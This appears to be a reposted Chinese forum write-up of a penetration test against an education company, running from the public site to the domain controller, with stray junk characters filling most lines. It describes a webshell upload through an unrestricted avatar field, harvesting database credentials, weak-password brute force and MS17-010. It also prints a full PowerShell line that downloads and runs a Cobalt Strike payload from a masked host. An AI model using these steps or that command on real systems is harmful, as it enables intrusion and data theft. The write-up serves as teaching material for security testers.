|
5 @0 r1 Q- n* v
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
* S: }9 H" ]' z% u) n7 s# M% D, B2 a # n1 ^, c9 ~3 h# A. v# H
! i. o' m8 V, s) }" ?% X
3 S/ N* f+ z; C% `( I* T
# w, D% s" x5 C/ h0 ~8 Q* [9 b
正文
4 \3 i# V Y& ~9 \8 l6 N
! ^, j' c/ Q3 }8 V9 t
$ N4 k4 h% {" Q9 s- H2 y! d ' D* m0 d, w, M! F# a& c# w
* P2 y! ? w" h+ H
# P u; ~ g* ^* E6 T
目标:www.xxxx.com(一家教育机构)
0 e* T% \7 D1 k( Z* @2 D/ ^8 p
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 Y) n1 X# B, ?/ T0 i
0 J" f: _* G& S
~& c2 ]! x& m% [ r @1 p
! W4 G E: u w9 D: v, d5 J
7 M3 \! Z9 i1 m3 x9 R+ M4 I
6 x9 ?; Z# D( H 进行了简单的信息搜集
2 N7 n* T: {+ Z9 F0 ]. U3 ~6 j
$ ?! b+ u. C3 c# t! N: H
- o" z2 X( P9 I; W! O: \ v! [; v- C
# g: T1 e9 h; l" s- B
8 I2 \) z* m! ^& A/ Z# u8 \, ?- C
子域名搜集
. A3 I* B9 [0 c% W, e. X8 }7 \; G $ i* { d! Z1 w" l4 D0 O9 n
; r0 P! K3 l# I: N5 P  3 d3 T G2 P9 f9 Y, [; T
! @, o0 a' l) F5 y' x* _! @! X* Q: @% ?. v8 e2 a% L) J: k+ |
fofa找资产
. i, W$ B: i3 {6 [$ w/ E
' E+ B$ _ W% R; v& f }- {. l1 Y
+ ^% i" o3 D) T. V k; w9 F" E 1 t' S5 b8 \ ]
) M- H D1 g' E: m* I7 {9 o" o  : J3 L% H) ]( h( s
; v7 {4 K6 H! y
2 V" [% q/ W9 U& ^1 e
一共七个资产。去重之后只有两个。
5 A; G' A4 w( ^) p' j) ~
# R+ s9 Y" x+ ^: p5 H+ Z. O
. [. e, C7 ]9 [5 _& j" L) ]
0 L1 q% i0 I" ]* A/ ~) s
; ~$ x- s; |) M) G! s 目录探测
8 S8 S; |1 h' Q( D3 e1 M
: M. P* X/ C1 W: Q, \5 R- a1 t! h% Y
$ h* J. T: F# d 
. d8 ^3 \% V1 G : b, D+ }( d$ n% p; _5 [
, b; o' L g c& n- \ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
5 S6 e2 z9 g2 p z
' P5 t! v( N& S8 O
! n3 Z8 s" {. L& e + Q4 _% I# ^* n7 `2 P
4 T8 R$ N& V0 i+ l
我又尝试了通过修改返回包来绕过登录界面0 Y. R9 y4 x" s ~8 t/ x
" \: q9 X7 c* o4 l$ B
* u5 N+ E5 L5 B$ T9 j! `2 f$ c, a
 0 ~" l' }0 Y: z0 R
# d5 s# z% d, l# L: X6 G/ W& `5 e; ]* D
还是不行,尝试注入无果
, ~. \" A2 ^, `% g, @3 R6 c8 H
/ [. P# ]4 @& U1 d" Q: X( n. }- d! m5 I- f8 }
; n, F! q% i9 g" U: O$ ~ " A, R/ [8 h) h
& f( V; y6 |/ s0 H 不过我目录探测出了一处Spring信息泄露
. Y; I _7 J! L) z, n3 B! n
. f9 A$ K3 x% T, }
' H! G' a2 @4 `/ X' Z: } ; c7 `5 I: s. ~/ j9 y
* F3 j; m5 i. T$ p 
I( g/ @7 z3 G \ ; [. [! k" g, T" E* F$ o7 I! b! ]
- F5 ^1 d: t" b. g* H" i, u3 \ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录1 C: R" \- w* y# U
$ K9 P5 U& \; P& J' E6 {6 J1 o
* z: V6 |2 P3 N
 1 X0 i, K8 M) e0 i
+ {/ W8 @7 z U& P: w& ^# y
w5 L6 {: }! {6 e
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。; Q( A/ M& V9 P9 V% w# g2 O- n( I
6 t- ?% X. g+ L% i& \4 {+ `4 {' p7 [. c" @: \
& p4 W) H+ [$ L1 i: R+ }
: k: C9 L5 w/ X# G# [- R2 P- s/ W0 y, p. G% q% Q" q- x3 L
获取有些师傅到这一步就手机抓包电脑测了。3 j8 k) ~7 B+ [0 X
7 o1 c5 @% F( K9 k, l1 W
1 a6 M6 A3 o& v4 U$ p Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。& t% T w: P3 U. L% {4 E- I
2 b3 c. N6 v* m( Y
* c7 R3 E) I7 b3 w! w, [! G8 c6 b 其中在一个公众号发现了小程序,可以进行注册。
# l4 O, o% G, Z, P8 A" x
; ?/ ^ ?9 {! j# J& c" l+ t' I$ s3 d; N$ _
看到了头像上传,尝试上传获取WebShell
, e$ i% E1 n k+ N' ]
( L! Z. \; b* a& D9 f6 k! X. u/ D$ k7 j
 8 I9 f- n" j+ y/ o
$ C: N* e4 p1 k, m
& \# O4 m% R" \! h
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
8 H* g5 s/ W. k6 f9 u, t. m- R
# P7 y/ k0 j0 J! g, p9 c1 t8 [+ _6 g9 ?$ M! `$ B8 F
 & N# `8 k2 @/ l1 R# u
; {7 u% a. |2 ?; a
; q9 X& g# Y# @ 然后上了大马0 _1 q+ v p0 s i
% c2 \# m+ m3 X1 |# T, r
$ L; S( v/ ]9 }: i1 \) K, K% v7 t  # K3 j$ A! T3 _+ s3 A/ |$ ^5 ]
/ `; n+ @$ \# H6 o
& }% ~: W' |! n+ a) A) K& ?) h
) F) q2 X2 M2 C7 X5 r; y 0 p' j1 ?+ E* [9 [! D* H% V
, P; I1 x/ }5 h8 B: \$ ]
通过翻找文件发现数据库账号密码
s( Z- o5 Z- d! v2 m
1 C! y& |( g; ]# _2 y3 a9 N
1 \# J2 b8 g) r$ s  $ K2 G! }$ m5 m4 l: c
' i1 P X7 D7 Y* j$ }! a. x; Z0 P
5 t2 `4 ?+ l& O0 L( V1 o1 I6 C --内网渗透8 g# J' _* s! S9 C
! f& u0 e3 P$ Z
' @. N2 Z' u3 u2 L0 W; B
直接通过powershell执行 cs上线" f* o: F. G7 O& z4 |
- A: ]: D7 \: H4 @3 p3 `7 u. y: A4 J
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))": j q% V+ p2 F/ R
* \3 N- j L. V( N
+ s6 I% @3 S4 [% Y+ H+ q
 / Q2 r8 ^# t- `5 b4 j1 F
4 N S: K6 O ?" F/ v1 \% ?1 f& Z. x5 P3 s6 M6 ~" Z- M" s* |/ M! n
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
& @% z# K7 g }$ D ; y3 x* ?1 A/ h2 g" V
1 y: l" ]5 n3 v. B% e: A
 6 D) o& K7 v$ R4 Z
5 F3 o7 T/ r0 `: ], m( ~1 T1 H5 }$ S; o" A* G! z6 J
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
4 s k* g- e. ^2 s+ F
6 S% \: e0 ]# @2 v
5 f3 |4 f' K$ ~' `# |
% j ~6 b6 N- v: F: @* k + Y- z2 w0 f: _* M" ^1 m6 ?
- X8 _" \" k: O- T! B  6 i1 i" k( J; B, J' i# a
/ o/ N7 `: F T, }. [2 i( F
# t- M: m" z+ W. [- ^- R1 K 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
2 N1 F6 e8 ~& p. T. @
' z; i/ _$ j. m; T K0 R$ z& k0 `/ X0 b5 p0 o& b
& g0 b+ x; W( q0 l4 E' Y: l1 b" r( R5 _' H5 d, b! e0 l- f4 d4 N& T
: y! r% X: [; y# H0 P) U
. `& V. P% d- Y4 H5 \! G% U, o4 r+ X. W, e0 w- b0 X9 g# l
9 ^1 c) s$ `( T9 o/ f; Q# s! J
0 E% h8 f3 ~' r# V& e; Z! k4 n
" x8 k1 C/ ?1 z- m2 O# W6 H ' s! Z- J( K0 p4 X' ?* U4 e
5 P& x* x3 J. i1 n( D
4 { q8 \8 `( m/ t$ T. ~4 \
4 h( T& ~# _* b) ^
4 g- H4 u8 u2 ]5 R1 n' P 小结
' Y) l# G# d. V. F
! H+ B0 D3 x) w9 P- T- ?* {* B: l m
* @( M- P2 U' i
# K5 P1 ]3 G$ H9 {0 n' o6 Q* H* W0 } i- q9 J
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
# \; A" _ _0 m" n" |
, {! G( [1 O* {+ k: C9 A. c
1 S0 } Z* ] K6 c; A 3 _1 ~4 w1 k/ Z
. d& a- l& V) \7 ?( O- A1 k0 i" {) v6 E, Y7 E
-
8 L4 a* X% N1 ~) T
" V0 a# g% ]0 D
- p5 T# A9 Q: W$ P0 C
- ' X l7 u5 X- G0 U/ H7 L7 j9 o; f
) E$ r, [+ w3 r
6 m# x# f' j! Q7 x
$ A% w- z s/ v6 G' S$ R6 @3 F5 Y
/ E2 X0 Y9 N8 I; P1 ~ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html5 f1 P$ x2 F5 b! g
) z( N! V9 |. D* `/ ]; t
- @8 V# w# M( S0 i* n
6 l$ x( Q4 u3 f" I- _. ^ | 
发表于 2024-3-1 19:41:32
收藏
支持
反对